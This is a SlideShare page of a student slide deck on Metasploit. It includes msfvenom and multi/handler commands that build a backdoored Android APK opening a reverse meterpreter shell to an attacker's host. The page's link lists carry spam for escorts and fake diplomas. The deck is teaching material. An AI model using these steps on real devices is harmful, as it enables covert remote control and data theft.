SlideShare una empresa de Scribd logo
1 de 20
METASPLOIT
GUIDE IN CHARGE
Mr.JINSONDEVIS
PRESENTED BY
HENEL PJ
MCA LE S3
ROLLNO 23
CONTENTS
 Introduction
Kali Linux
Penetration testing
 Metasploit
Introduction to Metasploit
Advantages & Disadvantages
 Steps to Hacking Android with Metasploit
Payload File Creation
Sending payload To the Target
Running Metasploit and AttackerSetup
Commands to exploits victim’sAndroid
 Future Scope
 Conclusion
 References
INTRODUCTION ON KALI LINUX
Debian-based Linuxdistribution aimed at advanced
PenetrationTestingand SecurityAuditing.
ReleaseDate: March 13th, 2013.
Security-focused versionof Linuxthat offers a large
numberof tools to seekout weaknessesand secure
your network.
Kali containsseveraltools
Information security tasks
PenetrationTesting,Securityresearch
Computer Forensicsand ReverseEngineering
Developers: Mati Aharoni, DevonKearnsand
Raphael Hertzog of offensive security.
Open source
600 penetration testing tools + Applications
Platforms - x86, x86-64, armel
LatestRelease– Kali 2017.3 – 21st November, 2017
Easyupgrade to future versions
Also called pentesting
Testing a computer system/network /Web application
to find vulnerabilities.
Benefits:
Intelligently manage vulnerabilities
Avoid the cost of network downtime
Meet regulatoryrequirements
Preserve corporate image and customer loyalty
Penetration Testing
MAIN TERMS
EXPLOIT- a piece of code written to take advantage of a
particular vulnerability inthe system.
PAYLOAD- simplescriptsthat the hackersutilize to interact with a
hacked system.
LHOST- TheIPaddress youwant your listener to bind to.
LPORT- Theport youwantyour listener to bind to.
Meterpreter - advanced, dynamically extensible payload that
uses in memorydll injection & extended over the n/w at runtime.
METASPLOIT
penetration testing platform that enables to find,
exploit, andvalidate vulnerabilities.
Author:Rapid7
License: BSD-3-clause
Twoversions:commercial and free(Community)
edition.
hardware requirements to install Metasploit
 1 GB RAM available
 1 GB+ available diskspace
 2 GHz+ processor
METASPLOITINTERFACES
Metasploit can be used either with Console,
command prompt or with GUI.
Msfconsole –part of metasploitframework,
provide interface with all options.
Msfcli –runs directly from the commandline&
puts priority on scripting.
Armitage –GUI for metasploit framework.
Advantages
 Open source
 Frequently updated
 Huge community
 Easy to deployuser specific exploit
Disadvantages
 Difficult to learn
 Can crash your system if not used wisely
 Requires deep knowledge for exploit development
HACKINGWIINDOWSWITH
METASPLOIT
STEP1:OPEN THE METASPLOIT CONSOLE IN KALI
Path:Applications → Exploitation Tools → Metasploit
Fig: Metasploit console
STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL
FOR CREATING THE PAYLOAD FILE
msf > msfvenom –p android/meterpreter/reverse_tcp
LHOST=192.168.43.207 LPORT=6060 R > clear.apk
STEP 3: Install apk
STEP 4: USE THE “exploit/multi/handler”
Payload Handler is a module that provides all the features of the
metasploit payload system to exploit. msf > use
exploit/multi/handler
STEP 5: SET THE PAYLOAD
msf exploit(multi/handler) > set payload
android/meterpreter/reverse_tcp
STEP 6: SET THE LOCAL HOST
msf exploit(multi/handler) > set LHOST 192.168.43.207
STEP 7: SET THE LOCAL PORT
msf exploit(multi/handler) > set LPORT 6060
STEP 8: RUN THE COMMAND “ exploit ”
msf exploit(multi/handler) > exploit
FUTURE SCOPE
Beingopen sourceframework, it hasgot huge
community support.
Inorder to face newsecurity challengesMetasploit
isfrequently updated for zero-day vulnerabilities.
More and moreexploits will be made available to
its database for users.
Upcomingversionswill be moreefficient, user-
friendly, GUI-based, web-based with customizing
options along with its interactive console.
CONCLUSION
The backdoor application when installed and turned on the
mobile allows attacker to read, write and modify data. Cautions are.
Never permanently enable installing of Apps from “Unknown
sources “.
Never take your phone to important meetings or anywhere you
don't want people listening.
Keep your Android up to date.
Installing antivirus software on your Android device.
REFERENCE
www.metasploit.com
www.rapid7.com
https://tools.kali.org/exploitation-tools/metasploit-
framework
www.securitytube.net
www.google.com
www.youtube.com
THANK YOU…………

Más contenido relacionado

La actualidad más candente

Nmap basics
Nmap basicsNmap basics
Nmap basicsitmind4u
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceEr. Shiva K. Shrestha
 
Intrusion detection
Intrusion detectionIntrusion detection
Intrusion detectionCAS
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Futurekaranwayne
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )Kashyap Mandaliya
 
Computer worms viruses and Prevention
Computer worms viruses and PreventionComputer worms viruses and Prevention
Computer worms viruses and PreventionPratimesh Pathak
 
What is Ransomware?
What is Ransomware?What is Ransomware?
What is Ransomware?Datto
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]David Sweigert
 
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoMalware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoTouhami Kasbaoui
 
Malware Classification and Analysis
Malware Classification and AnalysisMalware Classification and Analysis
Malware Classification and AnalysisPrashant Chopra
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
OpenVAS
OpenVASOpenVAS
OpenVASsvm
 

La actualidad más candente (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of Service
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Intrusion detection
Intrusion detectionIntrusion detection
Intrusion detection
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Future
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )
 
Computer worms viruses and Prevention
Computer worms viruses and PreventionComputer worms viruses and Prevention
Computer worms viruses and Prevention
 
NMAP
NMAPNMAP
NMAP
 
What is Ransomware?
What is Ransomware?What is Ransomware?
What is Ransomware?
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
 
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoMalware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence Morocco
 
Malware Classification and Analysis
Malware Classification and AnalysisMalware Classification and Analysis
Malware Classification and Analysis
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPS
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
OpenVAS
OpenVASOpenVAS
OpenVAS
 
Email security
Email securityEmail security
Email security
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
 

Similar a Metasploit

Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa ehenelpj
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploitwozgeass
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal PanchmahalkarPrajwal Panchmahalkar
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019Alexander Master
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdMetasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdAli Hussain
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworksphanleson
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - FalconerTony Godfrey
 

Similar a Metasploit (20)

Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Metapwn
MetapwnMetapwn
Metapwn
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdMetasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-Ltd
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Unveiling-Patchwork
Unveiling-PatchworkUnveiling-Patchwork
Unveiling-Patchwork
 
The FatRat
The FatRatThe FatRat
The FatRat
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
News bytes Oct-2011
News bytes  Oct-2011News bytes  Oct-2011
News bytes Oct-2011
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
 

Último

定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一Fs
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMartaLoveguard
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Lucknow
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 

Último (20)

定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 

Metasploit

  • 1. METASPLOIT GUIDE IN CHARGE Mr.JINSONDEVIS PRESENTED BY HENEL PJ MCA LE S3 ROLLNO 23
  • 2. CONTENTS  Introduction Kali Linux Penetration testing  Metasploit Introduction to Metasploit Advantages & Disadvantages  Steps to Hacking Android with Metasploit Payload File Creation Sending payload To the Target Running Metasploit and AttackerSetup Commands to exploits victim’sAndroid  Future Scope  Conclusion  References
  • 3. INTRODUCTION ON KALI LINUX Debian-based Linuxdistribution aimed at advanced PenetrationTestingand SecurityAuditing. ReleaseDate: March 13th, 2013. Security-focused versionof Linuxthat offers a large numberof tools to seekout weaknessesand secure your network. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch Computer Forensicsand ReverseEngineering
  • 4. Developers: Mati Aharoni, DevonKearnsand Raphael Hertzog of offensive security. Open source 600 penetration testing tools + Applications Platforms - x86, x86-64, armel LatestRelease– Kali 2017.3 – 21st November, 2017 Easyupgrade to future versions
  • 5. Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. Benefits: Intelligently manage vulnerabilities Avoid the cost of network downtime Meet regulatoryrequirements Preserve corporate image and customer loyalty Penetration Testing
  • 6. MAIN TERMS EXPLOIT- a piece of code written to take advantage of a particular vulnerability inthe system. PAYLOAD- simplescriptsthat the hackersutilize to interact with a hacked system. LHOST- TheIPaddress youwant your listener to bind to. LPORT- Theport youwantyour listener to bind to. Meterpreter - advanced, dynamically extensible payload that uses in memorydll injection & extended over the n/w at runtime.
  • 7. METASPLOIT penetration testing platform that enables to find, exploit, andvalidate vulnerabilities. Author:Rapid7 License: BSD-3-clause Twoversions:commercial and free(Community) edition. hardware requirements to install Metasploit  1 GB RAM available  1 GB+ available diskspace  2 GHz+ processor
  • 8. METASPLOITINTERFACES Metasploit can be used either with Console, command prompt or with GUI. Msfconsole –part of metasploitframework, provide interface with all options. Msfcli –runs directly from the commandline& puts priority on scripting. Armitage –GUI for metasploit framework.
  • 9. Advantages  Open source  Frequently updated  Huge community  Easy to deployuser specific exploit Disadvantages  Difficult to learn  Can crash your system if not used wisely  Requires deep knowledge for exploit development
  • 10. HACKINGWIINDOWSWITH METASPLOIT STEP1:OPEN THE METASPLOIT CONSOLE IN KALI Path:Applications → Exploitation Tools → Metasploit
  • 12. STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL FOR CREATING THE PAYLOAD FILE msf > msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 R > clear.apk
  • 14. STEP 4: USE THE “exploit/multi/handler” Payload Handler is a module that provides all the features of the metasploit payload system to exploit. msf > use exploit/multi/handler STEP 5: SET THE PAYLOAD msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp STEP 6: SET THE LOCAL HOST msf exploit(multi/handler) > set LHOST 192.168.43.207 STEP 7: SET THE LOCAL PORT msf exploit(multi/handler) > set LPORT 6060
  • 15.
  • 16. STEP 8: RUN THE COMMAND “ exploit ” msf exploit(multi/handler) > exploit
  • 17. FUTURE SCOPE Beingopen sourceframework, it hasgot huge community support. Inorder to face newsecurity challengesMetasploit isfrequently updated for zero-day vulnerabilities. More and moreexploits will be made available to its database for users. Upcomingversionswill be moreefficient, user- friendly, GUI-based, web-based with customizing options along with its interactive console.
  • 18. CONCLUSION The backdoor application when installed and turned on the mobile allows attacker to read, write and modify data. Cautions are. Never permanently enable installing of Apps from “Unknown sources “. Never take your phone to important meetings or anywhere you don't want people listening. Keep your Android up to date. Installing antivirus software on your Android device.